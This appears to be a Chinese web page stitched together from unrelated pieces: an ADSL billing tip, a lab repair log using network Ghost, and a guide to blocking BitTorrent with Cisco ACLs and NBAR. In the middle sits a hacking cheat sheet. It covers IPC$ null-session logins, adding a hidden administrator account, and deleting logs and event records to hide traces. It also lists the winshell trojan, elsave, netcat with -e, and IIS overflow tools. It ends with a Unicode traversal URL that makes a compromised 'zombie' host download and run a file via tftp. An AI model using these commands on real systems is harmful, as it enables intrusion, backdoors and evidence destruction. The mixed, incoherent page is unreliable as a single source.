我思故我在！

家中安装了ADSL且又申请了宽带有限包月资费的用户须留意，如将家中的网络设置成电脑开机后就能自动上网，有可能要花冤枉钱，因为在这种设置下，即便关闭了电脑主机，也不等于已经离网，ADSLMODEM仍会自动拨号上网，产生的上网时间一样要计费。

目前电信运营商提供宽带的计费模式主要有两种，一种是无限包月，一种是有限包月。无限包月没有上网时间的限制，而有限包月则限定了一定的上网时间，超过部分需另行付费。记者从本市电信运营商那里获悉，由于不少家庭上网的电脑不止一台，于是就会加装宽带路由器，实现多台电脑共享宽带网。据介绍，采用路由器方式上网，开机后便会自动拨号上网。每次下网时，即便关闭了电脑的电源，带电状态的ADSLMODEM照样会自动拨号上网，产生的上网时间一样要计费。因此，为了避免花冤枉钱，有限包月的宽带用户应尽量避免采用路由器方式上网，如一定要采用该方式上网，可设置成一般拨号方式(即使用虚拟拨号软件)上网，从而避免在不知情的情况下产生超时的费用。

据了解,上海铁通等电信运营商已在其营业厅陈放的业务手册内，对有限包月宽带用户如何避免使用过程中产生超时费用的问题进行了提示。

　 常用的几条NET命令：

　　（与远程主机建立空管连接） net use \\IP地址\ipc$ “” /use:”"

　　（以管理员身份登录远程主机） net use \\IP地址\ipc$ “密码” /use:”Administrator”

　　（传送文件到远程主机WINNT目录下）copy 本机目录路径\程序 \\IP地址\admin$

　　（查看远程主机时间） net time \\IP地址

　　（定时启动某个程序） at \\IP地址 02:18 readme.exe

　　（查看共享） net view \\IP地址

　　（查看netbios工作组列表） nbtstat -A IP地址

　　（将远程主机C盘映射为自己的F盘） net use f: \\IP地址\c$ “”/user:”Administrator”

　　（这两条把自己增加到管理员组）： net user 用户名 密码 /add

　　net localgroup Administrators 用户名 /add

　　（断开连接） net use \\IP地址\ipc$ /delete

　　扫尾：

　　del C:\winnt\system32\logfiles\*.*

　　del C:\winnt\ssytem32\config\*.evt

　　del C:\winnt\system32\dtclog\*.*

　　del C:\winnt\system32\*.log

　　del C:\winnt\system32\*.txt

　　del C:\winnt\*.txt

　　del C:\winnt\*.log

　　一、netsvc.exe

　　下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务：

　　netsvc /list \\IP地址

　　netsvc schedule \\IP地址 /query

　　netsvc \\IP地址 schedule /start

　　二、OpenTelnet.exe

　　远程启动主机的Telnet服务，并绑定端口到7878，例如：

　　OpenTelnet \\IP地址 用户名 密码 1 7878

　　然后就可以telnet到主机的7878端口，进入DOS方式下：

　　telnet IP地址 7878

　三、winshell.exe

　　一个非常小的木马（不到6K），telnet到主机的7878端口，输入密码winshell，当看到CMD>后，可打下面的命令：

　　p Path （查看winshell主程序的路径信息）

　　b reBoot （重新启动机器）

　　d shutDown （关闭机器）

　　s Shell （执行后你就会看到可爱的“C:\>”）

　　x eXit （退出本次登录会话，此命令并不终止winshell的运行）

　　CMD> http://…/srv.exe （通过http下载其他网站上的文件到运行winshell的机器上）

　　四、3389登陆器，GUI方式登录远程主机的

　　五、elsave.exe

　　事件日志清除工具

　　elsave -s \\IP地址 -l “application” -C

　　elsave -s \\IP地址 -l “system” -C

　　elsave -s \\IP地址 -l “security” -C

　　执行后成功清除应用程序日志，系统日志，安全日志

　　六、hbulot.exe

　　开启win2kserver和winxp的3389服务

　　hbulot [/r]

　　使用/r表示安装完成后自动重起目标使设置生效。

　　七、nc.exe(netcat.exe)

　　一个很好的工具，一些脚本程序都要用到它，也可做溢出后的连接用。

　　想要连接到某处: nc [-options] hostname port[s] [ports] …

　　绑定端口等待连接: nc -l -p port [-options] [hostname] [port]

　　参数:

　　-e prog 程序重定向，一旦连接，就执行 [危险!!]

　　-g gateway source-routing hop point[s], up to 8

　　-G num source-routing pointer: 4, 8, 12, …

　　-h 帮助信息

　　-i secs 延时的间隔

　　-l 监听模式，用于入站连接

　　-n 指定数字的IP地址，不能用hostname

　　-o file 记录16进制的传输

　　-p port 本地端口号

　　-r 任意指定本地及远程端口

　　-s addr 本地源地址

　　-u UDP模式

　　-v 详细输出——用两个-v可得到更详细的内容

　　-w secs timeout的时间

　　-z 将输入输出关掉——用于扫描时 八、TFTPD32.EXE

　　把自己的电脑临时变为一台FTP服务器，让肉鸡来下载文件，tftp命令要在肉鸡上执行，通常要利用Unicode漏洞或telnet到肉鸡，例如：

　　http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名

　　然后可以直接令文件运行：

　　http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名

　九、prihack.exe是IIS的printer远程缓冲区溢出工具。

　　idqover.exe是溢出idq的，选择“溢出后在一个端口监听”，然后用telnet连接它的监听端口，如果溢出成功，一连它的端口，绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出，成功以后winxp下需要打winxp。

　　一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor，exe要放到cgi-bin目录下，asp放到有ASP执行权限的目录。然后用IE浏览器连接。

　　一、一 Xscan命令行运行参数说明：

　　在检测过程中，按”[空格]“键可以查看各线程状态及扫描进度，按”q”键保存当前数据后提前退出程序，按”"强行关闭程序。

　　1.命令格式: xscan -host < 起始IP>[-< 终止IP>] < 检测项目> [其他选项]

　　xscan -file < 主机列表文件名> < 检测项目> [其他选项]

　　其中< 检测项目> 含义如下:

　　-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的”PORT-SCAN-OPTIONS\PORT-LIST”项定制待检测端口列表)；

　　-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件)；

　　-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件)；

　　-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的”CGI-ENCODE\encode_type”项设置编码方案)；

　　-iis : 检测IIS漏洞(可通过\dat\config.ini文件的”CGI-ENCODE\encode_type”项设置编码方案)；

　　[其他选项] 含义如下:

　　-v: 显示详细扫描进度

　　-p: 跳过Ping不通的主机

　　-o: 跳过没有检测到开放端口的主机

　　-t < 并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10

我们知道使用GHOST可以还原相同配置机器的镜像，方便网吧、学校里的网管们给机房里的每个电脑安装操作系统，加上网络GHOST的优势，可以说，只要安装配置完一台电脑，就可以很方便的安装完其他的所有的电脑，但是，如果没有光驱也没有软驱的情况下呢？

这里的虚拟软驱是vfloppy 1.5，大家可以去搜索一下就有的下，下面有详细的处理过程，看了以后你也会变高手哦！呵呵。

一． 确定问题所在
开始维修前，认真的检查了一遍所有的计算机，发现有总共 4 台电脑出
了问题，归类统计如下：

被病毒感染：计算机N29，计算机N24，计算机N21，计算机N22
屏幕模糊： 计算机N22

在确定好要修的电脑以后，分析了一下神州电脑机房的硬件环境，去掉不用关心的部分，总结如下：
神州品牌电脑能顺利运行Microsoft Windows 2000 Professional。网络环境是手动指定IP，网关，以及DNS。使用的IP段是10.44.125.*，子网掩码是 255.255.255.192，DNS服务器有两个，一个是202.101.172.35，还有一个是202.96.96.236，为了方便之后的操 作，写了一个WATTCP.CFG文件，内容如下：

IP=10.44.125.*
NETMASK=255.255.255.192
GATEWAY=10.44.125.1

无软驱无光驱，常规修复思路不能用。

二． 方法构思
方法设想：
1．使用网络GHOST，先在好的电脑上做一个GHOST镜象，由于电脑硬件配置都一样，所以可以采用GHOST镜象还原，再装上还原精灵就可以了。
2．使用GHOST 2003企业版，把做好的镜象使用FTP方式传输到坏的电脑上，在WINDOWS下使用GHOST2003还原解决。

三．具体维修过程
采用方案1，网络GHOST。

1．计算机N30
卸载还原精灵，确保系统安全完整无毒以后，使用虚拟软驱vfloppy进入纯DOS，在计算机N30下的F盘里面做好一个C盘的镜象文件win2000.gho。做好网络GHOST的服务端，配置好以后等待客户端的连接。服务名称是30，接受客户连接数目是5。

2．计算机N29
问题：中毒
处理方法：安全模式下手动查杀病毒，确保可以进入WINDOWS系统，记录IP网络信息如下：
IP=10.44.125.23
NETMASK=255.255.255.192
GATEWAY=10.44.125.1
把上述信息记录到网络GHOST文件夹下的WATTCP.CFG下，使用虚拟软驱vfloppy进入纯DOS，进入到网络GHOST文件夹，运行 netghost.bat，选择GhostCast，然后是Multicast，在服务名称下填写 30，选择自动模式，点OK，然后选择盘符C，点YES，这样就会自动还原计算机N30上的win2000.gho镜象文件了。
等全部还原完成以后就可以安装还原精灵，更换主机名和IP地址，到此，系统问题解决。

3．计算机N24
解决方法与计算机N29相同。

4．计算机N21
问题比较严重，所有的EXE文件都不能打开，在安全模式下杀毒完毕，还是不能启动，所以把C:\WINNT\SYSTEM32文件夹下的CMD.exe改 名为CMD.com，正常打开以后，使用assoc .exe=exefile命令修复EXE文件关联，把C:\WINNT文件夹下的REGEDIT.exe改名为REGEDIT.com，然后找到键值 HKEY_CLASSES_ROOT\exefile\shell\open\command，双击默认键值。输入“%1 %*”，点“确定”，这样就解决了，记得引号也要的。
然后按解决计算机N29的方法解决问题。

5．计算机N22
更换显示器以后按解决计算机N29的方法解决问题。

方法1:封锁BT端口

大家都知道如果要限制某项服务,就要在路由器上设置ACL(访问控制列表)将该服务所用的端口封掉,从而阻止该服务的正常运行.对BT软件,我们可以尝试封它的端口.一般情况下,BT软件使用的是6880-6890端口,小金在公司的核心路由器上使用以下命令将6880-6890端口全部封锁.

access-list 101 deny tcp any any range 6880 6890

access-list 101 deny tcp any range 6880 6890 any

access-list 101 permit ip any any

接着进入相应的端口,输入ip access-group 101 out 使访问控制列表生效.配置之后,网络带宽就会马上释放出来,网络速度得到提升.

但是,没过几天网络速度又减慢了,BT软件的端口明明被封了,什么软件还在占用大量的带宽呢,小金使用SNIFFER检测到几个不常用的端口的数据流量非常大,原来很多人使用第三方的BT软件(如比特精灵,BITCOMET)进行下载,这些软件可以自定义 传输数据的端口,修改为没有被封的端口后又可以进行BT下载了.

(注:缺点,由于BT端口变化较大,所以用ACL封端口收效甚微,而且配置条数多执行起来比较费劲,另外大量的ACL也占用了路由器的CPU资源,影响了其它服务

优点:利用访问控制列表ACL封锁BT比较好管理,配置起来也很容易,使用相对而言比较灵活.通过ACL可以有效非常有效封锁官方BT软件)

方法2:封锁BT服务器

既然无法有效的从本地端口进行封锁,那么只好从远程目标的地址入手.在进行BT下载时,本机首先要连接远端的BT服务器,从服务器下载种子列表再连接相应的种子,所以小金从各大BT论坛下载BT种子,以便获得BT服务器的地址.启动BITCOMET后选择 服务器列表,在TRACKER服务器处可以看到BT服务器的地址,如(bt.ydy.com)接着通过NUSLOOKUP或者PING命令可以得到服务器地址为202.103.X.X

获得服务器地址后就可以到核心服务器上对该地址进行封锁.具体命令为:access-list 102 deny tcp any 202.103.9.83 0.0.0.0

最后小金在网络出口端口上运行ip access-group 102 out 命令后,使该访问控制列表生效,这样网内用户就不能访问这个BT服务器了,同时该服务器提供的所有BT种子都无法使用,接下来,收信更多的的BT服务器的IP地址,将它们一一添加到控制列表102里,看着员工启动第三方的BT软件后连接种子数为0,下载速 度也为0的时候,终于松了一口气.

没过多久,公司再次出现网络运行缓慢的问题,小金通过监控系统发现又有人通过BITCOMET下载电影,虽然速度不如从前,但仍占用了相当大的带宽,是什么原因使用户又可以连接BT服务器呢,原来,在访问列表中使用的IP地址进行过滤,而一旦BT服务器的 IP地址发生了变化,针对IP地址的封锁就没有用了

(缺点:BT服务器很多,要找到每个服务器的IP地址然后进行封锁非常麻烦,而且也容易漏掉某些服务器,访问控制列表只能封锁IP地址不能封锁域名,对于IP地址经常变化的BT服务器来说,封锁是比较烦的.

优点:该方法能有效的封锁大批的BT服务器,网管通过简单的管理服务器IP地址就能封锁禁止BT软件的使用,对于自定义端口的BT软件起到了非常有效的封锁作用)

方法3:加载PDLM模块

使用CISCO公司出品的PDLM模块可以省去我们配置路由策略的工作,封锁效果非常好.上文介绍的两种方法.一个是对数据包使用的端口进行封锁,一个是对数据包的目的地址进行封锁,虽然在一定范围内有效,但不能起到全面禁止BT的作用,通过PDLM+N BAR的方法来封锁BT就存在这个问题了.

CISCO在其官方网站提供了三个PDLM模块,分别为KAZAA2.pdlm,bittorrent.pdlm.emonkey.pdlm可以用来封锁KAZAA,BT,电驴,在此我们就封锁BT下载为例,

建立一个TFTP站点,将bittorrent.pdlm复制到该站点,在核心路由器中使用ip nbar pdlm tftp://TFTP站点的IP/bittorrent.pdlm命令加载bittorrent.pdlm模块

接下来设置路器策略,具体命令如下:

class-map match-any bit

//创建一个CLASS_MAP名为BIT

match protocol bittorrent

//要求符合模块bittorrent的标准!

policy-map limit-bit

//创建一个POLICY-MAP名为LIMIT-BIT

class bit

//要求符合刚才定义的名为BIT的CLASS-MAP

drop

//如果符合则丢数据包!

interface gigabitEthernet0/2

//进入网络出口那个接口

service-policy input limit-bit

//当有数据包进入时启用LIMIT-BIT路由策略

service-policy output limit-bit

//当有数据包出的时候启用LIMIT-BIT路由策略

如果不想每次启动路由器的都要手工加载TFTP上的bittorrent.pdlm,可以把这个PDLM文件上传到路由器的FLASH中,然后选择TFTP服务器的IP地址即可.提示:封锁KAZAA或者是EDONKEY时,在路由器配置中将”match protocol后的bittorrent替换为KAZAA2或者EDONKEY即可,其它配置和封锁BT一样,

通过NBAR加载PDLM模块法封锁BT软件后,小金已经完全断绝了公司内部的BT使用,所有员工都能安心工作,网络速度也恢复到以前的稳定值了,

(缺点:该方法配置起来相对麻烦,指令非常多,而且路由器每次启动都要重新指定PDLM文件,如果将PDLM文件上传到路由器的FLASH中又会占用不少空间,通过路由策略进行封锁BT软件的同时也会占用路由器大量的CPU与内存的资源,影响了数据包的传输速度

优点:通过该方法可以彻底封锁BT下载)